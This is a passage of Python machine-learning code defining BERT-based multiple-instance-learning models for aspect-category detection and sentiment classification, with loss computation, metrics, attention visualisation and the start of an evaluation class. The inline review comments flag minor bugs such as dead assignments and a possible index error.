                                                                 word_embedding_dim)
                                                  for _ in range(self.category_num)]
        self.embedding_layer_aspect_attentions = nn.ModuleList(self.embedding_layer_aspect_attentions)
        self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)]
        self.category_fcs = nn.ModuleList(self.category_fcs)
        # Optional BiLSTM on top of BERT token embeddings (768 = BERT-base hidden size).
        if self.configuration['lstm_layer_num_in_bert'] != 0:
            num_layers = self.configuration['lstm_layer_num_in_bert']
            bilstm_hidden_size_in_bert = self.configuration['bilstm_hidden_size_in_bert']
            if bilstm_hidden_size_in_bert == 0:
                bilstm_hidden_size_in_bert = int(word_embedding_dim / 2)
            self.lstm = torch.nn.LSTM(768, bilstm_hidden_size_in_bert, batch_first=True,
                                      bidirectional=True, num_layers=num_layers,
                                      dropout=self.configuration['dropout_in_bert'])
            hidden_size = bilstm_hidden_size_in_bert * 2
        else:
            hidden_size = 768
        if self.configuration['only_bert']:
            self.sentiment_fc = nn.Sequential(
                # nn.Linear(768, 768),
                # nn.ReLU(),
                nn.Linear(768, self.polarity_num))
        else:
            self.sentiment_fc = nn.Sequential(
                # nn.Linear(hidden_size, hidden_size),
                # nn.ReLU(),
                nn.Linear(hidden_size, self.polarity_num))
        self.bert_word_embedder = bert_word_embedder
        self.dropout_after_embedding_layer = nn.Dropout(self.configuration['dropout_in_bert'])

    def set_bert_word_embedder(self, bert_word_embedder: TextFieldEmbedder=None):
        """Inject/replace the BERT embedder after construction."""
        self.bert_word_embedder = bert_word_embedder

    def set_grad_for_acd_parameter(self, requires_grad=True):
        """Freeze/unfreeze the ACD branch (encoder, attentions, category classifiers)."""
        acd_layers = []
        if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc':
            acd_layers.append(self.embedding_layer_fc)
        else:
            acd_layers.append(self.embedding_layer_lstm)
        acd_layers.append(self.embedding_layer_aspect_attentions)
        acd_layers.append(self.category_fcs)
        for layer in acd_layers:
            for name, value in layer.named_parameters():
                value.requires_grad = requires_grad

    def set_grad_for_acsc_parameter(self, requires_grad=True):
        """Freeze/unfreeze the ACSC branch (optional LSTM, sentiment head, BERT itself)."""
        acsc_layers = []
        if self.configuration['lstm_layer_num_in_bert'] != 0:
            acsc_layers.append(self.lstm)
        acsc_layers.append(self.sentiment_fc)
        for layer in acsc_layers:
            for name, value in layer.named_parameters():
                value.requires_grad = requires_grad
        # Reaches into the AllenNLP embedder internals to toggle the raw BERT model.
        bert_model = self.bert_word_embedder._token_embedders['bert'].bert_model
        for param in bert_model.parameters():
            param.requires_grad = requires_grad

    def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor,
                polarity_mask: torch.Tensor, sample: list, bert: torch.Tensor) -> torch.Tensor:
        """Run ACD + ACSC for all aspect categories at once.

        Returns a dict with 'pred_category', 'pred_sentiment', the attention
        weights, and (when `label` is given) 'loss'.
        """
        bert_mask = bert['mask']
        # bert_word_embeddings = self.bert_word_embedder(bert)
        token_type_ids = bert['bert-type-ids']
        # token_type_ids_size = token_type_ids.size()
        # for i in range(token_type_ids_size[1]):
        #     print(token_type_ids[0][i])
        offsets = bert['bert-offsets']
        # assumes bert_word_embeddings is (batch, category_num, bert_seq_len, 768) — TODO confirm
        bert_word_embeddings = self.bert_word_embedder(bert, token_type_ids=token_type_ids, offsets=offsets)
        mask = get_text_field_mask(tokens)
        word_embeddings = self.word_embedder(tokens)
        word_embeddings_size = word_embeddings.size()
        if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc':
            word_embeddings_fc = self.embedding_layer_fc(word_embeddings)
        else:
            word_embeddings_fc, (_, _) = self.embedding_layer_lstm(word_embeddings)
        embedding_layer_category_outputs = []
        embedding_layer_category_alphas = []
        embedding_layer_sentiment_outputs = []
        embedding_layer_sentiment_alphas = []
        bert_clses_of_all_aspect = []
        for i in range(self.category_num):
            # ACD: aspect-specific attention over the word embeddings.
            embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i]
            alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask)
            embedding_layer_category_alphas.append(alpha)
            category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False)
            embedding_layer_category_outputs.append(category_output)
            # Per-aspect [CLS] vector (position 0 of the i-th BERT pass).
            bert_clses_of_aspect = bert_word_embeddings[:, i, 0, :]
            bert_clses_of_all_aspect.append(bert_clses_of_aspect)
            if not self.configuration['only_bert']:
                bert_word_embeddings_of_aspect = bert_word_embeddings[:, i, :, :]
                # Re-align BERT subword embeddings to the original word positions:
                # average the subword vectors of each word; pad missing words with zeros.
                aspect_word_embeddings_from_bert = []
                for j in range(len(sample)):
                    aspect_word_embeddings_from_bert_of_one_sample = []
                    # presumably sample[j][6] maps word index -> list of BERT subword indices; verify against the reader
                    all_word_indices_in_bert = sample[j][6]
                    for k in range(word_embeddings_size[1]):
                        if k in all_word_indices_in_bert:
                            word_indices_in_bert = all_word_indices_in_bert[k]
                            word_bert_embeddings = []
                            for word_index_in_bert in word_indices_in_bert:
                                word_bert_embedding = bert_word_embeddings_of_aspect[j][word_index_in_bert]
                                word_bert_embeddings.append(word_bert_embedding)
                            if len(word_bert_embeddings) == 0:
                                # NOTE(review): debug leftover — empty mapping is silently ignored
                                print()
                            if len(word_bert_embeddings) > 1:
                                word_bert_embeddings_unsqueeze = [torch.unsqueeze(e, dim=0)
                                                                  for e in word_bert_embeddings]
                                word_bert_embeddings_cat = torch.cat(word_bert_embeddings_unsqueeze, dim=0)
                                word_bert_embeddings_sum = torch.sum(word_bert_embeddings_cat, dim=0)
                                word_bert_embeddings_ave = word_bert_embeddings_sum / len(word_bert_embeddings)
                            else:
                                word_bert_embeddings_ave = word_bert_embeddings[0]
                            aspect_word_embeddings_from_bert_of_one_sample.append(
                                torch.unsqueeze(word_bert_embeddings_ave, 0))
                        else:
                            # NOTE(review): IndexError if the very first word has no BERT indices ([-1] on empty list)
                            zero = torch.zeros_like(aspect_word_embeddings_from_bert_of_one_sample[-1])
                            aspect_word_embeddings_from_bert_of_one_sample.append(zero)
                    aspect_word_embeddings_from_bert_of_one_sample_cat = torch.cat(
                        aspect_word_embeddings_from_bert_of_one_sample, dim=0)
                    aspect_word_embeddings_from_bert.append(
                        torch.unsqueeze(aspect_word_embeddings_from_bert_of_one_sample_cat, dim=0))
                aspect_word_embeddings_from_bert_cat = torch.cat(aspect_word_embeddings_from_bert, dim=0)
                if self.configuration['lstm_layer_num_in_bert'] != 0:
                    aspect_word_embeddings_from_bert_cat, _ = self.lstm(aspect_word_embeddings_from_bert_cat)
                embedding_layer_sentiment_outputs.append(aspect_word_embeddings_from_bert_cat)
        lstm_layer_category_outputs = []
        lstm_layer_sentiment_outputs = []
        lstm_layer_words_sentiment_soft = []
        sentiment_output_clses_soft = []
        for i in range(self.category_num):
            # [CLS]-based sentiment logits for aspect i.
            sentiment_output_temp = bert_clses_of_all_aspect[i]
            if self.configuration['dropout_after_cls']:
                sentiment_output_temp = self.dropout_after_embedding_layer(sentiment_output_temp)
            sentiment_output_cls = self.sentiment_fc(sentiment_output_temp)
            sentiment_output_clses_soft.append(torch.softmax(sentiment_output_cls, dim=-1))
            if self.configuration['only_bert']:
                sentiment_output = sentiment_output_cls
                lstm_layer_sentiment_outputs.append(sentiment_output)
            else:
                # sentiment
                aspect_word_embeddings_from_bert = embedding_layer_sentiment_outputs[i]
                word_representation_for_sentiment = self.dropout_after_embedding_layer(aspect_word_embeddings_from_bert)
                sentiment_alpha = embedding_layer_category_alphas[i]
                if self.configuration['mil']:
                    # MIL: per-word sentiment distributions pooled by the ACD attention weights.
                    sentiment_alpha = sentiment_alpha.unsqueeze(1)
                    words_sentiment = self.sentiment_fc(word_representation_for_sentiment)
                    if self.configuration['mil_softmax']:
                        words_sentiment_soft = torch.softmax(words_sentiment, dim=-1)
                        lstm_layer_words_sentiment_soft.append(words_sentiment_soft)
                    else:
                        words_sentiment_soft = words_sentiment
                        lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1))
                    sentiment_output_mil = torch.matmul(sentiment_alpha,
                                                        words_sentiment_soft).squeeze(1)  # batch_size x 2*hidden_dim
                    if self.configuration['concat_cls_vector']:
                        if self.configuration['concat_cls_vector_mode'] == 'average':
                            sentiment_output = (sentiment_output_mil + sentiment_output_cls) / 2
                        else:
                            sentiment_output = sentiment_output_mil + sentiment_output_cls
                    else:
                        sentiment_output = sentiment_output_mil
                    lstm_layer_sentiment_outputs.append(sentiment_output)
                else:
                    # Non-MIL: pool word vectors first, classify the pooled vector.
                    sentiment_output_temp = self.element_wise_mul(word_representation_for_sentiment,
                                                                 sentiment_alpha, return_not_sum_result=False)
                    sentiment_output_not_mil = self.sentiment_fc(sentiment_output_temp)
                    if self.configuration['concat_cls_vector']:
                        if self.configuration['concat_cls_vector_mode'] == 'average':
                            sentiment_output = (sentiment_output_not_mil + sentiment_output_cls) / 2
                        else:
                            sentiment_output = sentiment_output_not_mil + sentiment_output_cls
                    else:
                        sentiment_output = sentiment_output_not_mil
                    lstm_layer_sentiment_outputs.append(sentiment_output)
        final_category_outputs = []
        final_lstm_category_outputs = []
        final_sentiment_outputs = []
        for i in range(self.category_num):
            fc = self.category_fcs[i]
            category_output = embedding_layer_category_outputs[i]
            final_category_output = fc(category_output)
            final_category_outputs.append(final_category_output)
            sentiment_output = lstm_layer_sentiment_outputs[i]
            final_sentiment_output = sentiment_output
            final_sentiment_outputs.append(final_sentiment_output)
        output = {}
        if label is not None:
            category_labels = []
            polarity_labels = []
            polarity_masks = []
            # Layout: label[:, :category_num] = aspect presence, label[:, category_num:2*category_num] = polarities.
            for i in range(self.category_num):
                category_labels.append(label[:, i])
                polarity_labels.append(label[:, i + self.category_num])
                polarity_masks.append(polarity_mask[:, i])
            loss = 0  # NOTE(review): dead assignment — reassigned unconditionally below
            total_category_loss = 0
            total_sentiment_loss = 0
            for i in range(self.category_num):
                category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1),
                                                        category_labels[i])
                sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long())
                if not self.configuration['only_sc']:
                    total_category_loss += category_temp_loss
                if not self.configuration['only_acd']:
                    total_sentiment_loss += sentiment_temp_loss
            # NOTE(review): category_loss_weight / sentiment_loss_weight are not set in the visible
            # __init__ — presumably attributes of TextInAllAspectSentimentOutModel; verify.
            loss = self.category_loss_weight * total_category_loss + self.sentiment_loss_weight * total_sentiment_loss
            # sentiment accuracy
            sentiment_logit = torch.cat(final_sentiment_outputs)
            sentiment_label = torch.cat(polarity_labels)
            sentiment_mask = torch.cat(polarity_masks)
            self._accuracy(sentiment_logit, sentiment_label, sentiment_mask)
            # category f1
            final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs]
            category_prob = torch.cat(final_category_outputs_prob).squeeze()
            category_label = torch.cat(category_labels)
            self._f1(category_prob, category_label)
            output['loss'] = loss
        # visualize attention
        pred_category = [torch.sigmoid(e) for e in final_category_outputs]
        pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs]
        output['pred_category'] = pred_category
        output['pred_sentiment'] = pred_sentiment
        output['embedding_layer_category_alphas'] = embedding_layer_category_alphas
        output['lstm_layer_words_sentiment_soft'] = lstm_layer_words_sentiment_soft
        if self.configuration['visualize_attention']:
            for i in range(len(sample)):
                words: list = sample[i][2]
                # if not ('while' in words and 'it' in words):
                #     continue
                attention_labels = [e.split('/')[0] for e in self.categories]
                # category
                visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy()
                                              for j in range(self.category_num)]
                titles = ['true: %s - pred: %s' % (str(label[i][j].detach().cpu().numpy()),
                                                   str(pred_category[j][i].detach().cpu().numpy()))
                          for j in range(self.category_num)]
                # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words)
                # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category,
                #                                                        attention_labels, titles, savefig_filepath)
                attention_visualizer.plot_multi_attentions_of_sentence_backup(words, visual_attentions_category,
                                                                              attention_labels, titles)
                # sentiment lstm layer
                visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)]
                                                    for j in range(self.category_num)]
                if self.configuration['concat_cls_vector']:
                    # NOTE(review): mutates the sample's word list in place — affects later users of sample[i][2]
                    words.insert(0, '[CLS]')
                    clses_sentiment_temp = [e.unsqueeze(dim=1)[i] for e in sentiment_output_clses_soft]
                    visual_attentions_sentiment_temp = [torch.cat([visual_attentions_sentiment_temp[j],
                                                                   clses_sentiment_temp[j]], dim=0)
                                                        for j in range(len(visual_attentions_sentiment_temp))]
                visual_attentions_sentiment_temp = [e.detach().cpu().numpy()
                                                    for e in visual_attentions_sentiment_temp]
                for j in range(self.category_num):
                    c_label = label[i][j].detach().cpu().numpy().tolist()
                    if c_label == 1:
                        visual_attentions_sentiment = []
                        labels_sentiment = []
                        sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist())
                        # -100 marks "no polarity annotated" for this aspect.
                        if sentiment_true_index == -100:
                            continue
                        titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]),
                                                                          str(pred_sentiment[j][i].detach().cpu().numpy()),
                                                                          str(self.polarites))]
                        c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy()
                        if self.configuration['concat_cls_vector']:
                            c_attention = np.array([1] + c_attention.tolist())
                        visual_attentions_sentiment.append(c_attention)
                        labels_sentiment.append(self.categories[j].split('/')[0])
                        s_distributions = visual_attentions_sentiment_temp[j]
                        for k in range(self.polarity_num):
                            labels_sentiment.append(self.polarites[k])
                            visual_attentions_sentiment.append(s_distributions[:, k])
                        titles_sentiment.extend([''] * 3)
                        # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words)
                        # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_sentiment,
                        #                                                        labels_sentiment,
                        #                                                        titles_sentiment, savefig_filepath)
                        attention_visualizer.plot_multi_attentions_of_sentence_backup(words,
                                                                                      visual_attentions_sentiment,
                                                                                      labels_sentiment,
                                                                                      titles_sentiment)
        return output

    def get_metrics(self, reset: bool = False) -> Dict[str, float]:
        """Return sentiment accuracy and aspect-category F1 accumulated by forward()."""
        metrics = {
            'accuracy': self._accuracy.get_metric(reset),
            'category_f1': self._f1.get_metric(reset)['fscore']
        }
        return metrics


class AsMilSimultaneouslyBertSingle(TextInAllAspectSentimentOutModel):
    """Variant of AsMilSimultaneouslyBert that uses a single BERT pass
    (index 0) shared by all aspect categories instead of one pass per aspect.
    """

    def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder,
                 categories: list, polarities: list, vocab: Vocabulary, configuration: dict,
                 bert_word_embedder: TextFieldEmbedder=None):
        super().__init__(vocab)
        self.configuration = configuration
        self.word_embedder = word_embedder
        self.position_embedder = position_embedder
        self.categories = categories
        self.polarites = polarities
        self.category_num = len(categories)
        self.polarity_num = len(polarities)
        self.category_loss = nn.BCEWithLogitsLoss()
        self.sentiment_loss = nn.CrossEntropyLoss()
        self._accuracy = metrics.CategoricalAccuracy()
        self._f1 \
            = allennlp_metrics.BinaryF1(0.5)
        word_embedding_dim = word_embedder.get_output_dim()
        # Context encoder over the (non-BERT) word embeddings used by ACD.
        if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc':
            self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True)
        else:
            self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, word_embedding_dim,
                                                      batch_first=True, bidirectional=False, num_layers=1)
        # One attention head and one binary classifier per aspect category.
        self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim, word_embedding_dim)
                                                  for _ in range(self.category_num)]
        self.embedding_layer_aspect_attentions = nn.ModuleList(self.embedding_layer_aspect_attentions)
        self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)]
        self.category_fcs = nn.ModuleList(self.category_fcs)
        # Optional BiLSTM on top of BERT token embeddings (768 = BERT-base hidden size).
        if self.configuration['lstm_layer_num_in_bert'] != 0:
            num_layers = self.configuration['lstm_layer_num_in_bert']
            self.lstm = torch.nn.LSTM(768, int(word_embedding_dim / 2), batch_first=True,
                                      bidirectional=True, num_layers=num_layers,
                                      dropout=self.configuration['dropout_in_bert'])
            hidden_size = word_embedding_dim
        else:
            hidden_size = 768
        self.sentiment_fc = nn.Sequential(nn.Linear(hidden_size, self.polarity_num))
        self.bert_word_embedder = bert_word_embedder
        self.dropout_after_embedding_layer = nn.Dropout(self.configuration['dropout_in_bert'])

    def set_grad_for_acd_parameter(self, requires_grad=True):
        """Freeze/unfreeze the ACD branch (encoder, attentions, category classifiers)."""
        acd_layers = []
        if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc':
            acd_layers.append(self.embedding_layer_fc)
        else:
            acd_layers.append(self.embedding_layer_lstm)
        acd_layers.append(self.embedding_layer_aspect_attentions)
        acd_layers.append(self.category_fcs)
        for layer in acd_layers:
            for name, value in layer.named_parameters():
                value.requires_grad = requires_grad

    def set_grad_for_acsc_parameter(self, requires_grad=True):
        """Freeze/unfreeze the ACSC branch (optional LSTM, sentiment head, BERT itself)."""
        acsc_layers = []
        if self.configuration['lstm_layer_num_in_bert'] != 0:
            acsc_layers.append(self.lstm)
        acsc_layers.append(self.sentiment_fc)
        for layer in acsc_layers:
            for name, value in layer.named_parameters():
                value.requires_grad = requires_grad
        # Reaches into the AllenNLP embedder internals to toggle the raw BERT model.
        bert_model = self.bert_word_embedder._token_embedders['bert'].bert_model
        for param in bert_model.parameters():
            param.requires_grad = requires_grad

    def set_bert_word_embedder(self, bert_word_embedder: TextFieldEmbedder=None):
        """Inject/replace the BERT embedder after construction."""
        self.bert_word_embedder = bert_word_embedder

    def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor,
                polarity_mask: torch.Tensor, sample: list, bert: torch.Tensor) -> torch.Tensor:
        """Run ACD + ACSC with a single shared BERT pass (index 0 on the aspect axis)."""
        bert_mask = bert['mask']
        bert_word_embeddings = self.bert_word_embedder(bert)
        mask = get_text_field_mask(tokens)
        word_embeddings = self.word_embedder(tokens)
        word_embeddings_size = word_embeddings.size()
        if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc':
            word_embeddings_fc = self.embedding_layer_fc(word_embeddings)
        else:
            word_embeddings_fc, (_, _) = self.embedding_layer_lstm(word_embeddings)
        embedding_layer_category_outputs = []
        embedding_layer_category_alphas = []
        embedding_layer_sentiment_outputs = []
        embedding_layer_sentiment_alphas = []
        bert_clses_of_all_aspect = []
        for i in range(self.category_num):
            # ACD: aspect-specific attention over the word embeddings.
            embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i]
            alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask)
            embedding_layer_category_alphas.append(alpha)
            category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False)
            embedding_layer_category_outputs.append(category_output)
            # Single shared BERT pass: always index 0 (unlike the per-aspect variant).
            bert_clses_of_aspect = bert_word_embeddings[:, 0, 0, :]
            bert_clses_of_all_aspect.append(bert_clses_of_aspect)
            if not self.configuration['only_bert']:
                # NOTE(review): this re-aligns the same shared BERT output once per category —
                # the work inside this branch is identical on every iteration of i; only [0] is read later.
                bert_word_embeddings_of_aspect = bert_word_embeddings[:, 0, :, :]
                aspect_word_embeddings_from_bert = []
                for j in range(len(sample)):
                    aspect_word_embeddings_from_bert_of_one_sample = []
                    # presumably sample[j][6] maps word index -> list of BERT subword indices; verify against the reader
                    all_word_indices_in_bert = sample[j][6]
                    for k in range(word_embeddings_size[1]):
                        if k in all_word_indices_in_bert:
                            word_indices_in_bert = all_word_indices_in_bert[k]
                            word_bert_embeddings = []
                            for word_index_in_bert in word_indices_in_bert:
                                word_bert_embedding = bert_word_embeddings_of_aspect[j][word_index_in_bert]
                                word_bert_embeddings.append(word_bert_embedding)
                            if len(word_bert_embeddings) == 0:
                                # NOTE(review): debug leftover — empty mapping is silently ignored
                                print()
                            if len(word_bert_embeddings) > 1:
                                word_bert_embeddings_unsqueeze = [torch.unsqueeze(e, dim=0)
                                                                  for e in word_bert_embeddings]
                                word_bert_embeddings_cat = torch.cat(word_bert_embeddings_unsqueeze, dim=0)
                                word_bert_embeddings_sum = torch.sum(word_bert_embeddings_cat, dim=0)
                                word_bert_embeddings_ave = word_bert_embeddings_sum / len(word_bert_embeddings)
                            else:
                                word_bert_embeddings_ave = word_bert_embeddings[0]
                            aspect_word_embeddings_from_bert_of_one_sample.append(
                                torch.unsqueeze(word_bert_embeddings_ave, 0))
                        else:
                            # NOTE(review): IndexError if the very first word has no BERT indices ([-1] on empty list)
                            zero = torch.zeros_like(aspect_word_embeddings_from_bert_of_one_sample[-1])
                            aspect_word_embeddings_from_bert_of_one_sample.append(zero)
                    aspect_word_embeddings_from_bert_of_one_sample_cat = torch.cat(
                        aspect_word_embeddings_from_bert_of_one_sample, dim=0)
                    aspect_word_embeddings_from_bert.append(
                        torch.unsqueeze(aspect_word_embeddings_from_bert_of_one_sample_cat, dim=0))
                aspect_word_embeddings_from_bert_cat = torch.cat(aspect_word_embeddings_from_bert, dim=0)
                if self.configuration['lstm_layer_num_in_bert'] != 0:
                    aspect_word_embeddings_from_bert_cat, _ = self.lstm(aspect_word_embeddings_from_bert_cat)
                embedding_layer_sentiment_outputs.append(aspect_word_embeddings_from_bert_cat)
        lstm_layer_category_outputs = []
        lstm_layer_sentiment_outputs = []
        lstm_layer_words_sentiment_soft = []
        for i in range(self.category_num):
            # Shared [CLS]-based sentiment logits (same for every aspect in this variant).
            sentiment_output_temp = bert_clses_of_all_aspect[0]
            sentiment_output_cls = self.sentiment_fc(sentiment_output_temp)
            if self.configuration['only_bert']:
                sentiment_output = sentiment_output_cls
                lstm_layer_sentiment_outputs.append(sentiment_output)
            else:
                # sentiment
                aspect_word_embeddings_from_bert = embedding_layer_sentiment_outputs[0]
                word_representation_for_sentiment = self.dropout_after_embedding_layer(aspect_word_embeddings_from_bert)
                sentiment_alpha = embedding_layer_category_alphas[i]
                if self.configuration['mil']:
                    # MIL: per-word sentiment distributions pooled by the ACD attention weights.
                    sentiment_alpha = sentiment_alpha.unsqueeze(1)
                    words_sentiment = self.sentiment_fc(word_representation_for_sentiment)
                    if self.configuration['mil_softmax']:
                        words_sentiment_soft = torch.softmax(words_sentiment, dim=-1)
                        lstm_layer_words_sentiment_soft.append(words_sentiment_soft)
                    else:
                        words_sentiment_soft = words_sentiment
                        lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1))
                    sentiment_output_mil = torch.matmul(sentiment_alpha,
                                                        words_sentiment_soft).squeeze(1)  # batch_size x 2*hidden_dim
                    if self.configuration['concat_cls_vector']:
                        if self.configuration['mil_softmax']:
                            sentiment_output_cls_softmax = torch.softmax(sentiment_output_cls, dim=-1)
                            sentiment_output = sentiment_output_mil + sentiment_output_cls_softmax
                        else:
                            sentiment_output = sentiment_output_mil + sentiment_output_cls
                    else:
                        sentiment_output = sentiment_output_mil
                    lstm_layer_sentiment_outputs.append(sentiment_output)
                else:
                    # Non-MIL: pool word vectors first, classify the pooled vector.
                    sentiment_output_temp = self.element_wise_mul(word_representation_for_sentiment,
                                                                 sentiment_alpha, return_not_sum_result=False)
                    sentiment_output_not_mil = self.sentiment_fc(sentiment_output_temp)
                    if self.configuration['concat_cls_vector']:
                        sentiment_output = sentiment_output_not_mil + sentiment_output_cls
                    else:
                        sentiment_output = sentiment_output_not_mil
                    lstm_layer_sentiment_outputs.append(sentiment_output)
        final_category_outputs = []
        final_lstm_category_outputs = []
        final_sentiment_outputs = []
        for i in range(self.category_num):
            fc = self.category_fcs[i]
            category_output = embedding_layer_category_outputs[i]
            final_category_output = fc(category_output)
            final_category_outputs.append(final_category_output)
            sentiment_output = lstm_layer_sentiment_outputs[i]
            final_sentiment_output = sentiment_output
            final_sentiment_outputs.append(final_sentiment_output)
        output = {}
        if label is not None:
            category_labels = []
            polarity_labels = []
            polarity_masks = []
            # Layout: label[:, :category_num] = aspect presence, label[:, category_num:2*category_num] = polarities.
            for i in range(self.category_num):
                category_labels.append(label[:, i])
                polarity_labels.append(label[:, i + self.category_num])
                polarity_masks.append(polarity_mask[:, i])
            loss = 0  # NOTE(review): dead assignment — reassigned unconditionally below
            total_category_loss = 0
            total_sentiment_loss = 0
            for i in range(self.category_num):
                category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1),
                                                        category_labels[i])
                sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long())
                total_category_loss += category_temp_loss
                if not self.configuration['only_acd']:
                    total_sentiment_loss += sentiment_temp_loss
            # NOTE(review): category_loss_weight / sentiment_loss_weight presumably come from the base class; verify.
            loss = self.category_loss_weight * total_category_loss + self.sentiment_loss_weight * total_sentiment_loss
            # sentiment accuracy
            sentiment_logit = torch.cat(final_sentiment_outputs)
            sentiment_label = torch.cat(polarity_labels)
            sentiment_mask = torch.cat(polarity_masks)
            self._accuracy(sentiment_logit, sentiment_label, sentiment_mask)
            # category f1
            final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs]
            category_prob = torch.cat(final_category_outputs_prob).squeeze()
            category_label = torch.cat(category_labels)
            self._f1(category_prob, category_label)
            output['loss'] = loss
        # visualize attention
        pred_category = [torch.sigmoid(e) for e in final_category_outputs]
        pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs]
        output['pred_category'] = pred_category
        output['pred_sentiment'] = pred_sentiment
        if self.configuration['visualize_attention']:
            for i in range(len(sample)):
                words = sample[i][2]
                attention_labels = [e.split('/')[0] for e in self.categories]
                # category
                visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy()
                                              for j in range(self.category_num)]
                titles = ['true: %s - pred: %s' % (str(label[i][j].detach().cpu().numpy()),
                                                   str(pred_category[j][i].detach().cpu().numpy()))
                          for j in range(self.category_num)]
                savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words)
                attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category,
                                                                       attention_labels, titles, savefig_filepath)
                # sentiment lstm layer
                visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)].detach().cpu().numpy()
                                                    for j in range(self.category_num)]
                for j in range(self.category_num):
                    c_label = label[i][j].detach().cpu().numpy().tolist()
                    if c_label == 1:
                        visual_attentions_sentiment = []
                        labels_sentiment = []
                        sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist())
                        # -100 marks "no polarity annotated" for this aspect.
                        if sentiment_true_index == -100:
                            continue
                        titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]),
                                                                          str(pred_sentiment[j][i].detach().cpu().numpy()),
                                                                          str(self.polarites))]
                        c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy()
                        visual_attentions_sentiment.append(c_attention)
                        labels_sentiment.append(self.categories[j].split('/')[0])
                        s_distributions = visual_attentions_sentiment_temp[j]
                        for k in range(self.polarity_num):
                            labels_sentiment.append(self.polarites[k])
                            visual_attentions_sentiment.append(s_distributions[:, k])
                        titles_sentiment.extend([''] * 3)
                        savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words)
                        attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_sentiment,
                                                                               labels_sentiment, titles_sentiment,
                                                                               savefig_filepath)
        return output

    def get_metrics(self, reset: bool = False) -> Dict[str, float]:
        """Return sentiment accuracy and aspect-category F1 accumulated by forward()."""
        metrics = {
            'accuracy': self._accuracy.get_metric(reset),
            'category_f1': self._f1.get_metric(reset)['fscore']
        }
        return metrics


class Estimator:
    """Abstract base: evaluate a model over a dataset and return a metrics dict."""

    def estimate(self, ds: Iterable[Instance]) -> dict:
        raise NotImplementedError('estimate')


class TextInAllAspectSentimentOutEstimator(Estimator):
    """Evaluates ACD/ACSC models: per-aspect F1/precision/recall, per-aspect
    sentiment accuracy, per-polarity metrics, and a merged category+sentiment micro-F1.
    """

    def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list,
                 cuda_device: int = -1, configuration: dict=None) -> None:
        super().__init__()
        self.model = model
        self.iterator = \
            iterator
        self.categories = categories
        self.polarities = polarities
        # "_temp" metrics are scratch accumulators, reset after each per-aspect read.
        self._sentiment_accuracy = metrics.CategoricalAccuracy()
        self._sentiment_accuracy_temp = metrics.CategoricalAccuracy()
        self._aspect_f1 = allennlp_metrics.BinaryF1(0.5)
        self._aspect_f1_temp = allennlp_metrics.BinaryF1(0.5)
        self.cuda_device = cuda_device
        self.configuration = configuration
        self.other_metrics = {}
        self.debug = False

    def _get_other_metrics(self, reset=True):
        """Return the accumulated auxiliary metrics dict, clearing it when reset=True."""
        result = self.other_metrics
        if reset:
            self.other_metrics = {}
        return result

    def _print_tensor(self, tensors: List):
        """Debug helper: print parallel tensors/arrays row by row, '-'-separated."""
        print('------------------------------------------------------')
        list_list = [e.detach().cpu().numpy().tolist() if not isinstance(e, np.ndarray) else e.tolist()
                     for e in tensors]
        for k in range(len(list_list[0])):
            format_str = '-'.join(['%s'] * len(list_list))
            values = tuple(e[k] for e in list_list)
            print(format_str % values)

    def _acd_aspect_and_metrics(self, category_labels, aspect_pred):
        """Per-aspect binary F1/precision/recall for category detection (threshold 0.5)."""
        acd_aspect_and_metrics = {}
        for i, aspect in enumerate(self.categories):
            aspect_label_i = category_labels[i].detach().cpu().numpy().astype(int)
